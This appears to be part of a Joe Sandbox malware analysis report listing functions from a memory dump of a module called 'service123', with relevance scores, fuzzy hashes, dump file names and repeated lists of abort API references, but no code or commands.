Instruction Fuzzy Hash: 6511FE72A082009FC714EF7AC58496BBBF5AB8A354F05CA6DE59597704E730D4088FB6

Function 6C37BBDB Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85f271324e43784f9fdebc8bc4c7243dbf6f9a9d553f9572d2554f304049fbf9
Instruction ID: bcab078e4d4ad4e1c7dfeb97d27810e0b8392853787f2595f7e2ac1256213351
Opcode Fuzzy Hash: 85f271324e43784f9fdebc8bc4c7243dbf6f9a9d553f9572d2554f304049fbf9
Instruction Fuzzy Hash: 8B31F4B0D043498FEB10EFA9C488BDDBBF4AF09308F154468D884AB751D7799948CF92

Function 6C3BAEC0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f717e681fd9189165315f78c50c98592b56f3d2cd94c83a700e48af7b1ccb12
Instruction ID: 969a3a8173eaaf7a50bafbefe55e8104aa53006aa1d0be4fb3c8d17638958951
Opcode Fuzzy Hash: 9f717e681fd9189165315f78c50c98592b56f3d2cd94c83a700e48af7b1ccb12
Instruction Fuzzy Hash: EA014C72A085409FC700FE7DC88045BB7F5BB9A318F14DA69E89897B09E631D8148FB7

Function 6C3BBD10 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ced507f5b67c02a53f0a3d3fb3fba7bdcbe54373b0b3d7ecde610ecdda03a4c
Instruction ID: d346e9aaa2f17b3b83760dc06c2b7a67fa90f47026ca7dace59e21812a1d0cc9
Opcode Fuzzy Hash: 4ced507f5b67c02a53f0a3d3fb3fba7bdcbe54373b0b3d7ecde610ecdda03a4c
Instruction Fuzzy Hash: 71012132A081408FC700FE7DC984856B7F5AB9A31CF44DA99E5989BB09DA35D4148F77

Function 6C3BB4D0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d765afff4069bcf4f8dedf1c9cf97285acb5e035ceb49bbb324817687f87da2
Instruction ID: c3e584a5505e2b37cad6933f675b16124fb047bb661a01695ffa1a5404000b83
Opcode Fuzzy Hash: 1d765afff4069bcf4f8dedf1c9cf97285acb5e035ceb49bbb324817687f87da2
Instruction Fuzzy Hash: D11118B29042008FD300EF29C585716BBF0AB99318F59C699D4988F715E77BC4068FA2

Function 6C3BC040 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bff6d750f18487d20b973d57608d4fff769297d4c251ac19937872fb129d21ee
Instruction ID: 945ecb57953c5799ba1725af528114ec7d1d52182ba6d458eab578e8cf2aeaaa
Opcode Fuzzy Hash: bff6d750f18487d20b973d57608d4fff769297d4c251ac19937872fb129d21ee
Instruction Fuzzy Hash: 0E014032A08140CFC700FE7EC88046AB7F1BB5A318F04DA69E99897B09E631E4148F76

Function 6C3E84A0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3df17673b1553bd5cef09174900a729b9127fd218ea185269a51cacc077c1916
Instruction ID: a3026eb0e3e5351612dd1903e2133ddf4cab1a7ba76e6ebbde222f3cf8f7d42c
Opcode Fuzzy Hash: 3df17673b1553bd5cef09174900a729b9127fd218ea185269a51cacc077c1916
Instruction Fuzzy Hash: 3C012C71A182908FC701EF3E848152BBBF0AB5A304F45D99AE8D8C7355E236C515CF67

Function 6C36D504 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction ID: ff30737674c0e3240b38248e72b9bd17eb7cfb49799e70fe074bd5dd1fd95c97
Opcode Fuzzy Hash: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction Fuzzy Hash: B5015EB1A052059BD704EF2AC88076AFBE4EF85348F60856DD988CBB05D332D885CBD2

Function 6C414360 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6295d8b9cc95529b2ad843a0d9a856b97c1fc269c50e19d0ea896acb30925e90
Instruction ID: 2bde30b16237c3f3522e7b0884c1aa931928971f2b6ff947f1384abc5f302652
Opcode Fuzzy Hash: 6295d8b9cc95529b2ad843a0d9a856b97c1fc269c50e19d0ea896acb30925e90
Instruction Fuzzy Hash: 60F0F476B081408F8700FE7E8942D7AB7F0A74A35CF89DAA8D898C7B05E234D0148E77

Function 6C39A1E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ca18aa32694f07436da490f5ef74cb85ae567d76539854ddb196542c7e242c
Instruction ID: 947b0ee320c93c4794b09362ea44540a3bc4328a1fcd5944abec9f8eef0e4295
Opcode Fuzzy Hash: d5ca18aa32694f07436da490f5ef74cb85ae567d76539854ddb196542c7e242c
Instruction Fuzzy Hash: 70D06271E045009FCB00EE29C541866B7B0AB46314B54DA95D49857609E776D4168F66

Function 6C36D974 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction ID: e17d1b39f0f33a7009582d612a105fa44d7c60ec8a65d2ea379b6a0418e72753
Opcode Fuzzy Hash: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction Fuzzy Hash: 04C012B19041004BCF00EF34C0C0578F6F1AF42688F125868C0C4D7A00E771C845CF86

Function 6C36D674 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction ID: 802b046bc3ab147782a62aefe660034eb1b2ad9f5cad9b89cebc017b765cd6ad
Opcode Fuzzy Hash: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction Fuzzy Hash: 5DC012B19041004BCF40EF34C0C0578F3F1AB42298F525868C0C4D7B00E771D846CB86

Function 6C36D7F4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction ID: 46f0fa94dc83e9bc5a57b273f9a37c02c77820c7df288e57113fd80a708cb3d8
Opcode Fuzzy Hash: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction Fuzzy Hash: 51C0C9B19041044ACF00EF28C084978B2F0AB82284F125468C084D7A00E731C845CA46

Function 6C35B1D0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: 48b6b7cdf249f1585ca9dfce560a9a72313dc0b10f557f8a98383bb76041e9cc
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: 11C012B4C0A2408AC200BF38810AA38BAB07B42628F8468ACD48013701E735C01C869F

Function 6C3428FA Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.MSVCRT ref: 6C416CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D03
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D08
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D12
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D17
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Strings

L:Bl, xrefs: 6C342929

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID: L:Bl
API String ID: 4206212132-121478961
Opcode ID: 13c36f28f6ae05285d966201ab076b59f81e8d7debe1aafa58dae93880e9830d
Instruction ID: b210221c407a96527c5d16a9f12fdad8a232313c687cc3c924a78d254d2770f2
Opcode Fuzzy Hash: 13c36f28f6ae05285d966201ab076b59f81e8d7debe1aafa58dae93880e9830d
Instruction Fuzzy Hash: 6F1193B2646201CBE708FF1CE892F65B7B1FB21309F019A58D194D7A15D739E818CFA1

Function 6C342A2F Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C416CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D03
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D08
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D12
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D17
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Strings

V:Bl, xrefs: 6C342A5E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID: V:Bl
API String ID: 4206212132-762122258
Opcode ID: c6f3f2214be6cfe24142a00609c5ec51202455dfe88357be9bc9de496ed53cea
Instruction ID: 204eb5642630937537051aed215154692c574866e8095c69863795de105c2b3e
Opcode Fuzzy Hash: c6f3f2214be6cfe24142a00609c5ec51202455dfe88357be9bc9de496ed53cea
Instruction Fuzzy Hash: 0011A5B2646201CBE708FF18D491F65B7B5FB11309F019A58D194D7A15D739E818CFA1

Function 6C3429B1 Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C416CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D03
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D08
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D12
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D17
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Strings

`:Bl, xrefs: 6C3429E0

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
